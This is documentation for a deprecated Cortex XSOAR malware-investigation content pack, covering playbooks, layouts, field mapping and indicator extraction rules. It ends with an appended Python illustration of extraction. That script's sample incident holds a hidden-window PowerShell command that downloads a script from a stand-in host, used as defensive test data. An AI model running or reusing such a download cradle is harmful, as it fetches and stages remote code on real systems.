# Endpoint Malware Investigation - Generic V2

**Deprecated.** This article is deprecated. Please check the Malware Investigation and Response article instead.
The Endpoint Malware Investigation content pack provides a generic framework to handle malware investigation. This pack incorporates the most relevant integrations in Cortex XSOAR for handling malware incidents.
The playbook in this pack includes the following steps:
- endpoint enrichment
- file retrieval for reputation enrichment and detonation
- host forensics
- enterprise threat hunting
- isolation of suspicious endpoints
- unisolation of endpoints after the investigation, and blocking of malicious indicators
These steps provide a solid basis and guidelines for malware investigation.
The new feature in Endpoint Malware Investigation - Generic V2 (available from version 6.1) is indicator extraction rules. This feature extracts all the relevant fields from incidents so that the Endpoint Malware Investigation - Generic V2 playbook runs properly.
# Pack Workflow
First you need to decide in which incidents to activate the Malware incident type. If you don't have a default playbook or incident type for your endpoint protection integration, this pack could be a good fit. You just need to define the Malware incident type for the relevant integration or create a dedicated classifier.
# What's in this Content Pack?
## Playbooks
There is 1 playbook in this pack. This playbook uses all the other playbooks mentioned in this article.

**Endpoint Malware Investigation - Generic V2**

This playbook provides a framework for handling a malware investigation through all essential stages. The playbook consists of 7 stages, where each stage contains the relevant playbook or tasks.
### Enrichment
The Get endpoint details - Generic playbook uses the generic `!endpoint` command to retrieve details on specific endpoints.
For additional information, refer to: Get endpoint details - Generic
### Retrieve File
The Retrieve File from Endpoint - Generic V2 playbook retrieves the required file for further investigation. This playbook can retrieve a file by its hash or by its file path.
For additional information, refer to: Retrieve File from Endpoint - Generic V2
### Detonation
Dynamic analysis of suspicious files is a significant stage in every malware incident. The analysis not only determines whether the file is malicious, but also provides indicators for further investigation. The Detonate File - Generic playbook detonates files through active integrations that support file detonation.
For additional information, refer to: Detonate File - Generic
### Forensics
The Get host forensics - Generic playbook provides additional forensics on the investigated host. Currently, this playbook uses only the Illusive Networks integration.
For additional information, refer to: Get host forensics - Generic
### Threat Hunting
The Threat Hunting - Generic playbook assists in hunting IOCs in your organization as part of the malware investigation.
For additional information, refer to: Threat Hunting - Generic
### Isolation
The Isolate Endpoint - Generic V2 playbook rapidly isolates the infected host and prevents the threat from spreading throughout your organization.
For additional information, refer to: Isolate Endpoint - Generic V2
### Unisolation
The Unisolate Endpoint - Generic playbook unisolates endpoints according to the endpoint ID or hostname provided by the playbook input.
For additional information, refer to: Unisolate Endpoint - Generic
### Remediation and Blocking Indicators
The Block Indicators - Generic v2 playbook blocks the malicious indicators that were discovered during the investigation. The playbook blocks files, IPs, URLs, and user accounts.
For additional information, refer to: Block Indicators - Generic v2
## Layouts
The Malware incident layout has three tabs:

### Incident info tab
Layout sections | Description |
---|---|
Case Details | Information that is associated with the incident, such as: Type, Owner, Source Brand, Source instance, Playbook, Severity. |
Source Details | Information that is associated with the source host of the incident, such as: IP, user, hostname, src OS, etc. |
File Attributes | Information regarding the suspicious file that was involved in the incident. |
Threat Hunting Results | Results of the Threat Hunting - Generic playbook. |
Notes | Comments entered by the user regarding the incident. |
Team Members | A list of the analysts who participated in this incident. |
Timeline Information | Information regarding the incident timeline, such as: time occurred, last update, closed time, etc. |
Child Incidents | Incidents that were created from this incident. |
Work Plan | Information regarding the playbook tasks from the Work Plan. |
Linked Incidents | Incidents that were linked to the current incident. |
Closing Information | Information regarding the closing of the incident. |
### Investigation tab
Layout sections | Description |
---|---|
Malware Details | Malicious file details such as: tactics, technique, command line, etc. |
Endpoint details | Details of the endpoints that were involved in the investigation. |
Forensics | Forensic data that was retrieved by the Get host forensics playbook. |
Investigation Report | The investigation summary report. |
Indicators | Indicators that were extracted from the incident. |
### Similar incidents tab
Displays information for similar incidents based on the DBotFindSimilarIncidentsByIndicators script.

Layout sections | Description |
---|---|
Incident ID | The similar incident ID. |
Created | The date when the similar incident was created. |
Name | The name of the similar incident. |
Similarity Incident | The similarity score of the incident. |
Parent CMD line | The arguments in the command line of the parent process. |
File Path | The path of the suspicious file. |
Command Line | The arguments of the command line that triggered the file. |
# Before You Start
## [Classification and Mapping](https://xsoar.pan.dev/docs/incidents/incident-classification-mapping)
To use the Endpoint Malware Investigation - Generic V2 playbook, we strongly recommend that you set up classification and mapping for the relevant integration.
- Navigate to Settings > Integrations > Classification and Mapping.
- Mark the checkbox of the relevant integration that you want to map.
- Click Duplicate.
- Click the copy you just created.
- From the Incident Type dropdown list, select Malware.
- From the Select Instance dropdown list, select the instance that you want to map. After selecting your instance, the Data fetched JSON is loaded.
- Map the relevant fields from the JSON by selecting the keys and clicking Choose data path. See the table in the Extraction Rules section for the fields to map. For information about creating a mapper, see Create a Mapper.
- Click Save Version.
- Navigate to Settings > Integrations > Servers & Services.
- Access the relevant integration instance settings and edit them as follows:
  - From the Incident Type dropdown list, select Malware.
  - For the Mapper, select the mapper you created.
## Extraction Rules
In version 6.1 a new feature was added to XSOAR: Auto Extract from incident fields. This feature extracts indicators from incident fields and enriches their reputations using the commands and scripts defined for the indicator type. You can automatically extract indicators in the following scenarios:
- When fetching incidents
- In a playbook task
- Using the command line
For the Malware incident type layout to display the relevant fields, and for the playbook to extract indicators from them, map the fields as shown in the table below so that they appear in the Malware incident layout.
Refer to the incident classification and mapping documentation for relevant guidance.
Note: Fields that are not mapped will not appear in the layout.
File Attributes | Source Details | Malware Details |
---|---|---|
File Name | Src | CMD |
File Path | Host Name | Scenario |
File Hash | Src NT Domain | Objective |
MD5 | Src Operating System | Tactic |
SHA1 | Users | Tactic ID |
SHA256 | | Technique |
File Size | | Technique ID |
Signature | | Description |
In the Endpoint Malware Investigation - Generic V2 playbook, the indicators are extracted according to the indicators extraction rules of the malware incident type.
To view the indicators that will be extracted:
- Navigate to Settings > Advanced > Incident Types.
- Mark the Malware checkbox.
- Click Indicator Extraction Rules.
If you want to edit the indicator extraction rules, you need to detach the Malware incident type. When you finish editing the rules, you must reattach the Malware incident type.
- Navigate to Settings > Advanced > Incident Types.
- Mark the Malware checkbox.
- Click Detach.
- Mark the Malware checkbox.
- Click Indicator Extraction Rules.
- Edit the rules.
- When you are finished editing, click Save.
- Mark the Malware checkbox.
- (Optional) Click Reattach. Note that if you reattach the incident type, the next content update will override any changes you made to the default playbook and indicator extraction rules.
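As an added illustration (not part of this article or of the XSOAR code base) of why the per-field extraction rules matter, the following Python script scans a constructed Malware incident whose keys follow the mapping table above, once with field-specific rules and once with an "extract from every field" mode. The rule table, the regexes and the two modes are a simplified model of the behaviour, not XSOAR's real schema or implementation.

```python
import re
from collections import defaultdict
from typing import Optional

# Constructed sample: a Malware incident after the mapper has filled the
# fields from the mapping table above (every value here is made up).
SAMPLE_INCIDENT = {
    "filename": "invoice.pdf.exe",
    "filepath": "C:\\Users\\alice\\Downloads\\invoice.pdf.exe",
    "filehash": "0123456789abcdef" * 2,   # MD5-length hex (32 chars)
    "sha256": "0123456789abcdef" * 4,     # SHA256-length hex (64 chars)
    "src": "10.20.30.40",
    "hostname": "WS-ALICE-01",
    "cmd": "powershell -w hidden -c (New-Object Net.WebClient)"
           ".DownloadString('http://updates.example.test/a.ps1')",
    # Not in the mapping table: ignored when rules are field-specific.
    "description": "Reported by 192.0.2.7 via the helpdesk",
}

# Simplified model (assumption, not the real XSOAR schema) of the Malware
# incident type's extraction rules: field -> indicator types to look for.
EXTRACTION_RULES = {
    "filehash": {"File"},
    "sha256": {"File"},
    "src": {"IP"},
    "cmd": {"URL"},
}

PATTERNS = {
    "File": re.compile(r"\b(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})\b"),
    "IP": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "URL": re.compile(r"https?://[^\s'\"<>)]+"),
}


def extract_indicators(incident: dict, rules: Optional[dict] = None) -> dict:
    """Return {indicator_type: sorted unique values} found in the incident.
    rules=None models an "extract from all fields" mode, so unmapped
    free-text fields such as the description also contribute indicators."""
    if rules is None:
        rules = {field: set(PATTERNS) for field in incident}
    found = defaultdict(set)
    for field, types in rules.items():
        value = incident.get(field)
        if not value:
            continue  # field not mapped or empty: nothing to scan
        for ind_type in types:
            found[ind_type].update(PATTERNS[ind_type].findall(str(value)))
    return {t: sorted(v) for t, v in found.items()}
```

With the field-specific rules only the mapped fields yield indicators (two file hashes, the source IP and the download URL from the command line), while the all-fields mode also pulls the IP out of the free-text description.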
## Integrations
The following is a list of integrations each playbook/sub-playbook uses.